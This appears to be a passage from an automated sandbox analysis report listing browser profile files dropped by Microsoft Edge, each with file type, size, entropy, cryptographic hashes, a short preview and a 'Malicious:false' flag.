                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.116858157294927
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7ihRRM1wkn23oH+Tcwt86FB2KLlpifq2Pwkn23oH+Tcwt865IFUv:76rfYeb/FFLTEvYfYeb/WFUv
                                                                                                                                                                                                                                                                                  MD5:0060A3F59AC901FBCAB6E383867E22D8
                                                                                                                                                                                                                                                                                  SHA1:5CF91D947773A7DA016C37A3EF5699E5BC65DA95
                                                                                                                                                                                                                                                                                  SHA-256:ABFEB65C0A34C17E62472C104CA46D9EE73AAA995317633180CC76D44D86DB2C
                                                                                                                                                                                                                                                                                  SHA-512:7CCF4727108098637ED09B2ACA877DEE2E5485A2D25FEC456DA511C688BEBCF88247A055BC6BB2A69BFCA0D1A81C62EE37609DD6D91C32809D680A6BF72A1732
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.842 1e74 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2024/12/10-12:41:28.886 1e74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.160784383789535
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73T2yq2Pwkn23oH+Tcwt8NIFUt8O3Tc21Zmw+O3TcjRkwOwkn23oH+Tcwt8+eLJ:73T2yvYfYebpFUt8O3T7/+O3TcjR5JfO
                                                                                                                                                                                                                                                                                  MD5:836D3C4A12349E78B42448474B92C4D0
                                                                                                                                                                                                                                                                                  SHA1:244E119569FBD8EA333D1A8C3AA7954B48AA41B2
                                                                                                                                                                                                                                                                                  SHA-256:97D793C88E8DF0E75A2609F93828C5F3C5574F8194214CD4BA63FAEA4517B15D
                                                                                                                                                                                                                                                                                  SHA-512:8475CFEAB09C0B63FEFEA29BBD9AAF7DED5BC72085E95DF2C9C67136937E38148272C90F112A0B2D779E40CB8FB9E5C478B6F372555556979917EA55A1039BB3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.635 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:29.636 1e70 Recovering log #3.2024/12/10-12:41:29.637 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.160784383789535
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73T2yq2Pwkn23oH+Tcwt8NIFUt8O3Tc21Zmw+O3TcjRkwOwkn23oH+Tcwt8+eLJ:73T2yvYfYebpFUt8O3T7/+O3TcjR5JfO
                                                                                                                                                                                                                                                                                  MD5:836D3C4A12349E78B42448474B92C4D0
                                                                                                                                                                                                                                                                                  SHA1:244E119569FBD8EA333D1A8C3AA7954B48AA41B2
                                                                                                                                                                                                                                                                                  SHA-256:97D793C88E8DF0E75A2609F93828C5F3C5574F8194214CD4BA63FAEA4517B15D
                                                                                                                                                                                                                                                                                  SHA-512:8475CFEAB09C0B63FEFEA29BBD9AAF7DED5BC72085E95DF2C9C67136937E38148272C90F112A0B2D779E40CB8FB9E5C478B6F372555556979917EA55A1039BB3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.635 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:41:29.636 1e70 Recovering log #3.2024/12/10-12:41:29.637 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5978007196409957
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:J8GuW386GL4U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjNRW:JMb+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                  MD5:4B33FA41C836A3B777701A69A3217A73
                                                                                                                                                                                                                                                                                  SHA1:22400CAF7CCBB1892FD73EE5F4B6C949ACA291C5
                                                                                                                                                                                                                                                                                  SHA-256:01D91F7209E340C0096C83CFC17F513A0AB9185DC11AF4D25CE321937313899E
                                                                                                                                                                                                                                                                                  SHA-512:4D70E46252F7EC0A9AEB0B994E6DA6F5216D4DA28D6ABFB6FEA2254DEB3633E410A5C36F67E41D47E5C6AE3FDCDE5EAE2A9742BAF008D68F1E7102EF1E8114E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3283577581710296
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:OA/J3+t76Y4QZZofU99pO0BYlISqR4EZY4QZvGEMn:vhHQws9LdlBQZGln
                                                                                                                                                                                                                                                                                  MD5:ABD119D2BE25FA86EACB75C324BDF206
                                                                                                                                                                                                                                                                                  SHA1:FD18DC40D842D50771BE8C409C145736F5F4650A
                                                                                                                                                                                                                                                                                  SHA-256:711B88D2D977004009CBDD6E7448FE4FD7B7E18C0E69BBA9F5325BA894B5A623
                                                                                                                                                                                                                                                                                  SHA-512:1E37EE617559ABA5EE831A7DE74363864DF428F7DD7C0D39078B04BCD1593B46465582F2716B5612A140C81B42283E69D067797FCC0BDD7534533FC4B717A820
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...................'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.549251445285301
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:zj9P0Rgam6I3hP773pLjQkQerOP/Kbt5RKToaAic9:zdrHp7te2OP/KRKcp9
                                                                                                                                                                                                                                                                                  MD5:83F6B5F3E8EAF4E16AB5E776DD1499A9
                                                                                                                                                                                                                                                                                  SHA1:240778CC21A4C42D573CD95E53933D0286900699
                                                                                                                                                                                                                                                                                  SHA-256:E58C31B875AE4F40063BE55D003CF300ED1D5B74C53258FB89466B3023D55D23
                                                                                                                                                                                                                                                                                  SHA-512:49967B77836AACF778A94073FD190D1086CED1C605FE7A2FA63E983C0518D2F0AB56F88D9A7145DB8A3B2052395D7F1D3008273C9590B8046FD83614D5CC585A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.229511233164337
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7wuvYfYeb8rcHEZrELFUt8Owc/+Owc5JfYeb8rcHEZrEZSJ:7wsYfYeb8nZrExg8OwswGJfYeb8nZrE8
                                                                                                                                                                                                                                                                                  MD5:CB50CEFDF81C3E9FB1153A41E69FE87D
                                                                                                                                                                                                                                                                                  SHA1:C602C790B1D630CD1622DAF0EA737A50D6057C15
                                                                                                                                                                                                                                                                                  SHA-256:1E72D6932FB02BD8DC104A2E84BC3FA8AF49BFE10DBDA2D52F35E272C1086E19
                                                                                                                                                                                                                                                                                  SHA-512:D6FF89E8C75FE61708AC6450F71A423ECAF747EE47320FF0043E012DC8784B42CF93E4977953EC711805A193B07C0FCF097752B80DC5F2D7B609D0E43C795F4D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:31.820 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:41:31.821 1e68 Recovering log #3.2024/12/10-12:41:31.821 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):406
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.229511233164337
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7wuvYfYeb8rcHEZrELFUt8Owc/+Owc5JfYeb8rcHEZrEZSJ:7wsYfYeb8nZrExg8OwswGJfYeb8nZrE8
                                                                                                                                                                                                                                                                                  MD5:CB50CEFDF81C3E9FB1153A41E69FE87D
                                                                                                                                                                                                                                                                                  SHA1:C602C790B1D630CD1622DAF0EA737A50D6057C15
                                                                                                                                                                                                                                                                                  SHA-256:1E72D6932FB02BD8DC104A2E84BC3FA8AF49BFE10DBDA2D52F35E272C1086E19
                                                                                                                                                                                                                                                                                  SHA-512:D6FF89E8C75FE61708AC6450F71A423ECAF747EE47320FF0043E012DC8784B42CF93E4977953EC711805A193B07C0FCF097752B80DC5F2D7B609D0E43C795F4D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:31.820 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:41:31.821 1e68 Recovering log #3.2024/12/10-12:41:31.821 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.148653010658664
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73QU+q2Pwkn23oH+Tcwt8a2jMGIFUt8O3fpXZmw+O37aVVkwOwkn23oH+Tcwt8as:73QU+vYfYeb8EFUt8O3fpX/+O3WVV5Jg
                                                                                                                                                                                                                                                                                  MD5:B1B1FBD20C6BC8F821B173B906AEA7A1
                                                                                                                                                                                                                                                                                  SHA1:A6E22051A033B0A5AE3BFC3296E67DE11046C556
                                                                                                                                                                                                                                                                                  SHA-256:BE9C1EAACE0606A585F749B00C51A1E41C2145CF0D94AD1A96FF134F0107FF03
                                                                                                                                                                                                                                                                                  SHA-512:7A64D83D246611058D3B075827BF7C91480F9D12D9A96F348DBA3ECD4BE12E795F85052E01808E485A87738A97FEBBCC1FDCA122E7D8092DE122EE4EE7C2E7EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.715 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.722 1f7c Recovering log #3.2024/12/10-12:41:29.725 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.148653010658664
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:73QU+q2Pwkn23oH+Tcwt8a2jMGIFUt8O3fpXZmw+O37aVVkwOwkn23oH+Tcwt8as:73QU+vYfYeb8EFUt8O3fpX/+O3WVV5Jg
                                                                                                                                                                                                                                                                                  MD5:B1B1FBD20C6BC8F821B173B906AEA7A1
                                                                                                                                                                                                                                                                                  SHA1:A6E22051A033B0A5AE3BFC3296E67DE11046C556
                                                                                                                                                                                                                                                                                  SHA-256:BE9C1EAACE0606A585F749B00C51A1E41C2145CF0D94AD1A96FF134F0107FF03
                                                                                                                                                                                                                                                                                  SHA-512:7A64D83D246611058D3B075827BF7C91480F9D12D9A96F348DBA3ECD4BE12E795F85052E01808E485A87738A97FEBBCC1FDCA122E7D8092DE122EE4EE7C2E7EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.715 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.722 1f7c Recovering log #3.2024/12/10-12:41:29.725 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

